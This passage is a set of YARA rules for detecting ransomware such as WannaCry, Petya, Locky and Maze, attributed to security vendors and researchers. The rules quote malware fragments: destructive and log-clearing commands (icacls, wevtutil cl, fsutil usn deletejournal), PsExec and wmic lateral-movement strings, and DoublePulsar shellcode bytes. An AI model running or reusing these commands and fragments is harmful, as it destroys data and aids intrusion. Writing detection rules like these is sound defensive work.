    $tres = { 21 44 4D 41 4C 4F 43 4B 33 2E 30 }
    $cuatro = { 21 44 4D 41 4C 4F 43 4B 34 2E 30 }
  condition:
    any of them
}

rule DMALocker4 : ransom {
  meta:
    Description = "Deteccion del ransomware DMA Locker version 4.0"
    ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/"
    Author = "SadFud"
    Date = "30/05/2016"
    Hash = "e3106005a0c026fc969b46c83ce9aeaee720df1bb17794768c6c9615f083d5d1"
  strings:
    $clave = { 21 44 4D 41 4C 4F 43 4B 34 2E 30 }
  condition:
    $clave
}

rule DoublePulsarXor_Petya {
  meta:
    description = "Rule to hit on the XORed DoublePulsar shellcode"
    author = "Patrick Jones"
    company = "Booz Allen Hamilton"
    reference1 = "https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html"
    reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf"
    date = "2017-06-28"
    hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
    hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"
  strings:
    $DoublePulsarXor_Petya = { FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE }
  condition:
    $DoublePulsarXor_Petya
}

rule DoublePulsarDllInjection_Petya {
  meta:
    description = "Rule to hit on the XORed DoublePulsar DLL injection shellcode"
    author = "Patrick Jones"
    company = "Booz Allen Hamilton"
    reference1 = "https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html"
    reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf"
    date = "2017-06-28"
    hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
    hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"
  strings:
    $DoublePulsarDllInjection_Petya = { 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 03 84 45 14 84 45 49 CC 33 33 33 24 77 CC CC CC 84 45 49 C4 33 33 33 24 84 CD CC CC 84 45 49 DC 33 33 33 84 47 49 CC 33 33 33 84 47 41 }
  condition:
    $DoublePulsarDllInjection_Petya
}

rule Erebus : ransom {
  meta:
    description = "Erebus Ransomware"
    author = "Joan Soriano / @joanbtl"
    date = "2017-06-23"
    version = "1.0"
    MD5 = "27d857e12b9be5d43f935b8cc86eaabf"
    SHA256 = "0b7996bca486575be15e68dba7cbd802b1e5f90436ba23f802da66292c8a055f"
    ref1 = "http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/"
  strings:
    $a = "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log"
    $b = "EREBUS IS BEST."
  condition:
    all of them
}

rule crime_ransomware_windows_GPGQwerty : crime_ransomware_windows_GPGQwerty {
  meta:
    author = "McAfee Labs"
    description = "Detect GPGQwerty ransomware"
    reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/"
  strings:
    $a = "gpg.exe –recipient qwerty  -o"
    $b = "%s%s.%d.qwerty"
    $c = "del /Q /F /S %s$recycle.bin"
    $d = "cryz1@protonmail.com"
  condition:
    all of them
}

rule GoldenEye_Ransomware_XLS {
  meta:
    description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"
    author = "Florian Roth"
    reference = "https://goo.gl/jp2SkT"
    date = "2016-12-06"
    hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"
  strings:
    $x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" ascii fullword
    $x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" ascii fullword
  condition:
    (uint16(0) == 53200 and filesize < 4096000 and 1 of them)
}

rule GoldenEyeRansomware_Dropper_MalformedZoomit {
  meta:
    description = "Auto-generated rule - file b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
    author = "Florian Roth"
    reference = "https://goo.gl/jp2SkT"
    date = "2016-12-06"
    hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"
  strings:
    $s1 = "ZoomIt - Sysinternals: www.sysinternals.com" ascii fullword
    $n1 = "Mark Russinovich" wide
  condition:
    (uint16(0) == 23117 and filesize < 819200 and $s1 and not $n1)
}

rule Locky_Ransomware : ransom {
  meta:
    description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
    author = "Florian Roth (with the help of binar.ly)"
    reference = "https://goo.gl/qScSrE"
    date = "2016-02-17"
    hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"
  strings:
    $o1 = { 45 B8 99 F7 F9 0F AF 45 B8 89 45 B8 }
    $o2 = { 2B 0A 0F AF 4D F8 89 4D F8 C7 45 }
  condition:
    all of ($o*)
}

rule Locky_Ransomware_2 : ransom {
  meta:
    description = "Regla para detectar RANSOM.LOCKY"
    author = "CCN-CERT"
    version = "1.0"
  strings:
    $a1 = { 2E 00 6C 00 6F 00 63 00 6B 00 79 00 00 }
    $a2 = { 00 5F 00 4C 00 6F 00 63 00 6B 00 79 00 }
    $a3 = { 5F 00 72 00 65 00 63 00 6F 00 76 00 65 }
    $a4 = { 00 72 00 5F 00 69 00 6E 00 73 00 74 00 }
    $a5 = { 72 00 75 00 63 00 74 00 69 00 6F 00 6E }
    $a6 = { 00 73 00 2E 00 74 00 78 00 74 00 00 }
    $a7 = { 53 6F 66 74 77 61 72 65 5C 4C 6F 63 6B 79 00 }
  condition:
    all of them
}

rule MS17_010_WanaCry_worm {
  meta:
    description = "Worm exploiting MS17-010 and dropping WannaCry Ransomware"
    author = "Felipe Molina (@felmoltor)"
    reference = "https://www.exploit-db.com/exploits/41987/"
    date = "2017/05/12"
  strings:
    $ms17010_str1 = "PC NETWORK PROGRAM 1.0"
    $ms17010_str2 = "LANMAN1.0"
    $ms17010_str3 = "Windows for Workgroups 3.1a"
    $ms17010_str4 = "__TREEID__PLACEHOLDER__"
    $ms17010_str5 = "__USERID__PLACEHOLDER__"
    $wannacry_payload_substr1 = "h6agLCqPqVyXi2VSQ8O6Yb9ijBX54j"
    $wannacry_payload_substr2 = "h54WfF9cGigWFEx92bzmOd0UOaZlM"
    $wannacry_payload_substr3 = "tpGFEoLOU6+5I78Toh/nHs/RAP"
  condition:
    all of them
}

rule WannaDecryptor : WannaDecryptor {
  meta:
    description = "Detection for common strings of WannaDecryptor"
  strings:
    $id1 = "taskdl.exe"
    $id2 = "taskse.exe"
    $id3 = "r.wnry"
    $id4 = "s.wnry"
    $id5 = "t.wnry"
    $id6 = "u.wnry"
    $id7 = "msg/m_"
  condition:
    3 of them
}

rule Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549 : Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549 {
  meta:
    description = "Specific sample match for WannaCryptor"
    MD5 = "84c82835a5d21bbcf75a61706d8ab549"
    SHA1 = "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
    SHA256 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
    INFO = "Looks for 'taskdl' and 'taskse' at known offsets"
  strings:
    $taskdl = { 00 74 61 73 6B 64 6C }
    $taskse = { 00 74 61 73 6B 73 65 }
  condition:
    $taskdl at 3419456 and $taskse at 3422953
}

rule Wanna_Sample_4da1f312a214c07143abeeafb695d904 : Wanna_Sample_4da1f312a214c07143abeeafb695d904 {
  meta:
    description = "Specific sample match for WannaCryptor"
    MD5 = "4da1f312a214c07143abeeafb695d904"
    SHA1 = "b629f072c9241fd2451f1cbca2290197e72a8f5e"
    SHA256 = "aee20f9188a5c3954623583c6b0e6623ec90d5cd3fdec4e1001646e27664002c"
    INFO = "Looks for offsets of r.wry and s.wry instances"
  strings:
    $rwnry = { 72 2E 77 72 79 }
    $swnry = { 73 2E 77 72 79 }
  condition:
    $rwnry at 88195 and $swnry at 88656 and $rwnry at 4495639
}

rule NHS_Strain_Wanna : NHS_Strain_Wanna {
  meta:
    description = "Detection for worm-strain bundle of Wcry, DOublePulsar"
    MD5 = "db349b97c37d22f5ea1d1841e3c89eb4"
    SHA1 = "e889544aff85ffaf8b0d0da705105dee7c97fe26"
    SHA256 = "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
    INFO = "Looks for specific offsets of c.wnry and t.wnry strings"
  strings:
    $cwnry = { 63 2E 77 6E 72 79 }
    $twnry = { 74 2E 77 6E 72 79 }
  condition:
    $cwnry at 262324 and $twnry at 267672 and $cwnry at 284970
}

rule ransom_telefonica : TELEF {
  meta:
    author = "Jaume Martin <@Xumeiquer>"
    description = "Ransmoware Telefonica"
    date = "2017-05-13"
    reference = "http://www.elmundo.es/tecnologia/2017/05/12/59158a8ce5fdea194f8b4616.html"
    md5 = "7f7ccaa16fb15eb1c7399d422f8363e8"
    sha256 = "2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd"
  strings:
    $a = "RegCreateKeyW" ascii wide nocase
    $b = "cmd.exe /c"
    $c = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" ascii
    $d = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" ascii
    $e = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" ascii
    $f = "tasksche.exe"
  condition:
    uint16(0) == 23117 and $a and for all of ($b, $c, $d, $e, $f) : (@ > @a)
}

rule Wanna_Cry_Ransomware_Generic {
  meta:
    description = "Detects WannaCry Ransomware on Disk and in Virtual Page"
    author = "US-CERT Code Analysis Team"
    reference = "not set"
    date = "2017/05/12"
    hash0 = "4DA1F312A214C07143ABEEAFB695D904"
  strings:
    $s0 = { 41 00 44 00 4D 00 49 00 4E 00 24 }
    $s1 = "WannaDecryptor"
    $s2 = "WANNACRY"
    $s3 = "Microsoft Enhanced RSA and AES Cryptographic"
    $s4 = "PKS"
    $s5 = "StartTask"
    $s6 = "wcry@123"
    $s7 = { 2F 66 00 00 2F 72 }
    $s8 = "unzip 0.15 Copyrigh"
    $s9 = "Global\\WINDOWS_TASKOSHT_MUTEX"
    $s10 = "Global\\WINDOWS_TASKCST_MUTEX"
    $s11 = { 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 }
    $s12 = { 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68 }
    $s13 = "WNcry@2ol7"
    $s14 = "wcry@123"
    $s15 = "Global\\MsWinZonesCacheCounterMutexA"
  condition:
    $s0 and $s1 and $s2 and $s3 or $s4 and $s5 and $s6 and $s7 or $s8 and $s9 and $s10 or $s11 and $s12 or $s13 or $s14 or $s15
}

rule WannaCry_Ransomware {
  meta:
    description = "Detects WannaCry Ransomware"
    author = "Florian Roth (with the help of binar.ly)"
    reference = "https://goo.gl/HG2j5T"
    date = "2017-05-12"
    hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
  strings:
    $x1 = "icacls . /grant Everyone:F /T /C /Q" ascii fullword
    $x2 = "taskdl.exe" ascii fullword
    $x3 = "tasksche.exe" ascii fullword
    $x4 = "Global\\MsWinZonesCacheCounterMutexA" ascii fullword
    $x5 = "WNcry@2ol7" ascii fullword
    $x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii
    $x7 = "mssecsvc.exe" ascii fullword
    $x8 = "C:\\%s\\qeriuwjhrf" ascii fullword
    $x9 = "icacls . /grant Everyone:F /T /C /Q" ascii fullword
    $s1 = "C:\\%s\\%s" ascii fullword
    $s2 = "<!-- Windows 10 --> " ascii fullword
    $s3 = "cmd.exe /c \"%s\"" ascii fullword
    $s4 = "msg/m_portuguese.wnry" ascii fullword
    $s5 = "\\\\192.168.56.20\\IPC$" wide fullword
    $s6 = "\\\\172.16.99.5\\IPC$" wide fullword
    $op1 = { 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 }
    $op2 = { 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 }
    $op3 = { 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 }
    $op4 = { 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C }
    $op5 = { C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 }
    $op6 = { 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1 }
  condition:
    uint16(0) == 23117 and filesize < 10240000 and (1 of ($x*) and 1 of ($s*) or 3 of ($op*))
}

rule WannaCry_Ransomware_Gen {
  meta:
    description = "Detects WannaCry Ransomware"
    author = "Florian Roth (based on rule by US CERT)"
    reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A"
    date = "2017-05-12"
    hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05"
    hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df"
    hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359"
  strings:
    $s1 = "__TREEID__PLACEHOLDER__" ascii fullword
    $s2 = "__USERID__PLACEHOLDER__" ascii fullword
    $s3 = "Windows for Workgroups 3.1a" ascii fullword
    $s4 = "PC NETWORK PROGRAM 1.0" ascii fullword
    $s5 = "LANMAN1.0" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 5120000 and all of them
}

rule WannCry_m_vbs {
  meta:
    description = "Detects WannaCry Ransomware VBS"
    author = "Florian Roth"
    reference = "https://goo.gl/HG2j5T"
    date = "2017-05-12"
    hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b"
  strings:
    $x1 = ".TargetPath = \"C:\\@" ascii
    $x2 = ".CreateShortcut(\"C:\\@" ascii
    $s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii
  condition:
    (uint16(0) == 17747 and filesize < 1024 and all of them)
}

rule WannCry_BAT {
  meta:
    description = "Detects WannaCry Ransomware BATCH File"
    author = "Florian Roth"
    reference = "https://goo.gl/HG2j5T"
    date = "2017-05-12"
    hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077"
  strings:
    $s1 = "@.exe\">> m.vbs" ascii
    $s2 = "cscript.exe //nologo m.vbs" ascii fullword
    $s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii
    $s4 = "echo om.Save>> m.vbs" ascii fullword
  condition:
    (uint16(0) == 25920 and filesize < 1024 and 1 of them)
}

rule WannaCry_RansomNote {
  meta:
    description = "Detects WannaCry Ransomware Note"
    author = "Florian Roth"
    reference = "https://goo.gl/HG2j5T"
    date = "2017-05-12"
    hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e"
  strings:
    $s1 = "A:  Don't worry about decryption." ascii fullword
    $s2 = "Q:  What's wrong with my files?" ascii fullword
  condition:
    (uint16(0) == 14929 and filesize < 2048 and all of them)
}

rule lazaruswannacry {
  meta:
    description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
    date = "2017-05-15"
    reference = "https://twitter.com/neelmehta/status/864164081116225536"
    author = "Costin G. Raiu, Kaspersky Lab"
    version = "1.0"
    hash = "9c7c7149387a1c79679a87dd1ba755bc"
    hash = "ac21c8ad899727137c4b94458d7aa8d8"
  strings:
    $a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75 04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46 56 E8 }
    $a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00 68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00 FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0 08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0 10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0 2B C0 2C C0 FF FE }
  condition:
    uint16(0) == 23117 and filesize < 15000000 and all of them
}

rule WannaCry_Ransomware_Dropper {
  meta:
    description = "WannaCry Ransomware Dropper"
    reference = "https://www.cylance.com/en_us/blog/threat-spotlight-inside-the-wannacry-attack.html"
    date = "2017-05-12"
  strings:
    $s1 = "cmd.exe /c \"%s\"" ascii fullword
    $s2 = "tasksche.exe" ascii fullword
    $s3 = "icacls . /grant Everyone:F /T /C /Q" ascii fullword
    $s4 = "Global\\MsWinZonesCacheCounterMutexA" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 4194304 and all of them
}

rule WannaCry_SMB_Exploit {
  meta:
    description = "WannaCry SMB Exploit"
    reference = "https://www.cylance.com/en_us/blog/threat-spotlight-inside-the-wannacry-attack.html"
    date = "2017-05-12"
  strings:
    $s1 = { 53 4D 42 72 00 00 00 00 18 53 C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FE 00 00 40 00 00 62 00 02 50 43 20 4E 45 54 57 4F 52 4B 20 50 52 4F 47 52 41 4D 20 31 2E 30 00 02 4C 41 4E 4D 41 4E 31 2E 30 00 02 57 69 6E 64 6F 77 73 20 66 6F 72 20 57 6F 72 6B 67 72 6F 75 70 73 20 33 2E 31 61 00 02 4C 4D 31 2E 32 58 30 30 32 00 02 4C 41 4E 4D 41 4E 32 2E 31 00 02 4E 54 20 4C 4D 20 30 2E 31 32 00 00 00 00 00 00 00 88 FF 53 4D 42 73 00 00 00 00 18 07 C0 }
  condition:
    uint16(0) == 23117 and filesize < 4194304 and all of them and pe.imports("ws2_32.dll", "connect") and pe.imports("ws2_32.dll", "send") and pe.imports("ws2_32.dll", "recv") and pe.imports("ws2_32.dll", "socket") and pe.imports("ws2_32.dll", "closesocket")
}

rule wannacry_static_ransom : wannacry_static_ransom {
  meta:
    description = "Detects WannaCryptor spreaded during 2017-May-12th campaign and variants"
    author = "Blueliv"
    reference = "https://blueliv.com/research/wannacrypt-malware-analysis/"
    date = "2017-05-15"
  strings:
    $mutex01 = "Global\\MsWinZonesCacheCounterMutexA" ascii
    $lang01 = "m_bulgarian.wnr" ascii
    $lang02 = "m_vietnamese.wnry" ascii
    $startarg01 = "StartTask" ascii
    $startarg02 = "TaskStart" ascii
    $startarg03 = "StartSchedule" ascii
    $wcry01 = "WanaCrypt0r" ascii wide
    $wcry02 = "WANACRY" ascii
    $wcry03 = "WANNACRY" ascii
    $wcry04 = "WNCRYT" ascii wide
    $forig01 = ".wnry\x00" ascii
    $fvar01 = ".wry\x00" ascii
  condition:
    ($mutex01 or any of ($lang*)) and ($forig01 or all of ($fvar*)) and any of ($wcry*) and any of ($startarg*)
}

rule wannacry_memory_ransom : wannacry_memory_ransom {
  meta:
    description = "Detects WannaCryptor spreaded during 2017-May-12th campaign and variants in memory"
    author = "Blueliv"
    reference = "https://blueliv.com/research/wannacrypt-malware-analysis/"
    date = "2017-05-15"
  strings:
    $s01 = "%08X.eky"
    $s02 = "%08X.pky"
    $s03 = "%08X.res"
    $s04 = "%08X.dky"
    $s05 = "@WanaDecryptor@.exe"
  condition:
    all of them
}

rule worm_ms17_010 : worm_ms17_010 {
  meta:
    description = "Detects Worm used during 2017-May-12th WannaCry campaign, which is based on ETERNALBLUE"
    author = "Blueliv"
    reference = "https://blueliv.com/research/wannacrypt-malware-analysis/"
    date = "2017-05-15"
  strings:
    $s01 = "__TREEID__PLACEHOLDER__" ascii
    $s02 = "__USERID__PLACEHOLDER__@" ascii
    $s03 = "SMB3"
    $s05 = "SMBu"
    $s06 = "SMBs"
    $s07 = "SMBr"
    $s08 = "%s -m security" ascii
    $s09 = "%d.%d.%d.%d"
    $payloadwin2000_2195 = "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00"
    $payload2000_50 = "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"
  condition:
    all of them
}

rule Maze {
  meta:
    description = "Identifies Maze ransomware in memory or unpacked."
    author = "@bartblaze"
    date = "2019-11"
    tlp = "White"
  strings:
    $ = "Enc: %s" ascii wide
    $ = "Encrypting whole system" ascii wide
    $ = "Encrypting specified folder in --path parameter..." ascii wide
    $ = "!Finished in %d ms!" ascii wide
    $ = "--logging" ascii wide
    $ = "--nomutex" ascii wide
    $ = "--noshares" ascii wide
    $ = "--path" ascii wide
    $ = "Logging enabled | Maze" ascii wide
    $ = "NO SHARES | " ascii wide
    $ = "NO MUTEX | " ascii wide
    $ = "Encrypting:" ascii wide
    $ = "You need to buy decryptor in order to restore the files." ascii wide
    $ = "Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms" ascii wide
    $ = "%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s" ascii wide
    $ = "DECRYPT-FILES.txt" ascii wide fullword
  condition:
    5 of them
}

rule ransomware_PetrWrap {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect PetrWrap ransomware samples"
    reference = "https://securelist.com/schroedingers-petya/78870/"
    last_modified = "2017-06-27"
    author = "Kaspersky Lab"
    hash = "71B6A493388E7D0B40C83CE903BC6B04"
    version = "1.0"
  strings:
    $a1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcqYLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgqCXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu" wide fullword
    $a2 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls" wide fullword
    $a3 = "DESTROY ALL OF YOUR DATA PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" ascii fullword
    $a4 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" ascii fullword
    $a5 = "wowsmith123456posteo.net." wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1000000 and any of them
}

rule Petya_Ransomware {
  meta:
    description = "Detects Petya Ransomware"
    author = "Florian Roth"
    reference = "http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html"
    date = "2016-03-24"
    hash = "26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739"
  strings:
    $a1 = "<description>WinRAR SFX module</description>" ascii fullword
    $s1 = "BX-Proxy-Manual-Auth" wide fullword
    $s2 = "<!--The ID below indicates application support for Windows 10 -->" ascii fullword
    $s3 = "X-HTTP-Attempts" wide fullword
    $s4 = "@CommandLineMode" wide fullword
    $s5 = "X-Retry-After" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and $a1 and 3 of ($s*)
}

rule Ransom_Petya {
  meta:
    description = "Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015"
    author = "CCN-CERT"
    version = "1.0"
  strings:
    $a1 = { C1 C8 14 2B F0 03 F0 2B F0 03 F0 C1 C0 14 03 C2 }
    $a2 = { 46 F7 D8 81 EA 5A 93 F0 12 F7 DF C1 CB 10 81 F6 }
    $a3 = { 0C 88 B9 07 87 C6 C1 C3 01 03 C5 48 81 C3 A3 01 00 00 }
  condition:
    all of them
}

rule FE_CPE_MS17_010_RANSOMWARE {
  meta:
    version = "1.1"
    author = "Ian.Ahl@fireeye.com @TekDefense, Nicholas.Carr@mandiant.com @ItsReallyNick"
    date = "2017-06-27"
    description = "Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec"
    reference = "https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html"
  strings:
    $dmap01 = "\\\\.\\PhysicalDrive" ascii wide nocase
    $dmap02 = "\\\\.\\PhysicalDrive0" ascii wide nocase
    $dmap03 = "\\\\.\\C:" ascii wide nocase
    $dmap04 = "TERMSRV" ascii wide nocase
    $dmap05 = "\\admin$" ascii wide nocase
    $dmap06 = "GetLogicalDrives" ascii wide nocase
    $dmap07 = "GetDriveTypeW" ascii wide nocase
    $msg01 = "WARNING: DO NOT TURN OFF YOUR PC!" ascii wide nocase
    $msg02 = "IF YOU ABORT THIS PROCESS" ascii wide nocase
    $msg03 = "DESTROY ALL OF YOUR DATA!" ascii wide nocase
    $msg04 = "PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" ascii wide nocase
    $msg05 = "your important files are encrypted" ascii wide
    $msg06 = "Your personal installation key" ascii wide nocase
    $msg07 = "worth of Bitcoin to following address" ascii wide nocase
    $msg08 = "CHKDSK is repairing sector" ascii wide nocase
    $msg09 = "Repairing file system on " ascii wide nocase
    $msg10 = "Bitcoin wallet ID" ascii wide nocase
    $msg11 = "wowsmith123456@posteo.net" ascii wide nocase
    $msg12 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" ascii wide nocase
    $msg_pcre = /(en|de)crypt(ion|ed\.)/
    $functions01 = "need dictionary" ascii wide nocase
    $functions02 = "comspec" ascii wide nocase
    $functions03 = "OpenProcessToken" ascii wide nocase
    $functions04 = "CloseHandle" ascii wide nocase
    $functions05 = "EnterCriticalSection" ascii wide nocase
    $functions06 = "ExitProcess" ascii wide nocase
    $functions07 = "GetCurrentProcess" ascii wide nocase
    $functions08 = "GetProcAddress" ascii wide nocase
    $functions09 = "LeaveCriticalSection" ascii wide nocase
    $functions10 = "MultiByteToWideChar" ascii wide nocase
    $functions11 = "WideCharToMultiByte" ascii wide nocase
    $functions12 = "WriteFile" ascii wide nocase
    $functions13 = "CoTaskMemFree" ascii wide nocase
    $functions14 = "NamedPipe" ascii wide nocase
    $functions15 = "Sleep" ascii wide nocase
    $cmd01 = "wevtutil cl Setup" ascii wide nocase
    $cmd02 = "wevtutil cl System" ascii wide nocase
    $cmd03 = "wevtutil cl Security" ascii wide nocase
    $cmd04 = "wevtutil cl Application" ascii wide nocase
    $cmd05 = "fsutil usn deletejournal" ascii wide nocase
    $cmd06 = "schtasks " ascii wide nocase
    $cmd07 = "/Create /SC " ascii wide nocase
    $cmd08 = " /TN " ascii wide nocase
    $cmd09 = "at %02d:%02d %ws" ascii wide nocase
    $cmd10 = "shutdown.exe /r /f" ascii wide nocase
    $cmd11 = "-accepteula -s" ascii wide nocase
    $cmd12 = "wmic"
    $cmd13 = "/node:" ascii wide nocase
    $cmd14 = "process call create" ascii wide nocase
  condition:
    3 of ($dmap*) and 2 of ($msg*) and 9 of ($functions*) and 7 of ($cmd*)
}

rule petya_eternalblue : petya_eternalblue {
  meta:
    author = "blueliv"
    description = "Based on spreading petya version: 2017-06-28"
    reference = "https://blueliv.com/petya-ransomware-cyber-attack-is-spreading-across-the-globe-part-2/"
  strings:
    $cmd01 = "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%0" wide
    $cmd02 = "shutdown.exe /r /f" wide
    $cmd03 = "%s \\\\%s -accepteula -s" wide
    $cmd04 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1" wide
    $str01 = "they have been encrypted. Perhaps you are busy looking" wide
    $mbr01 = { 00 00 00 55 AA E9 ?? ?? }
  condition:
    all of them
}

rule pico_ransomware {
  meta:
    description = "Rule to detect Pico Ransomware"
    author = "Marc Rivero | @seifreed"
    reference = "https://twitter.com/siri_urz/status/1035138577934557184"
  strings:
    $s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" ascii fullword
    $s2 = "\\Downloads\\README.txt" ascii fullword
    $s3 = "\\Music\\README.txt" ascii fullword
    $s4 = "\\Videos\\README.txt" ascii fullword
    $s5 = "\\Pictures\\README.txt" ascii fullword
    $s6 = "\\Desktop\\README.txt" ascii fullword
    $s7 = "\\Documents\\README.txt" ascii fullword
    $s8 = "/c taskkill /im " ascii fullword
    $s9 = "\\AppData\\Roaming\\" ascii fullword
    $s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" wide fullword
    $s11 = "AppData\\Roaming" ascii fullword
    $s12 = "\\Downloads" ascii fullword
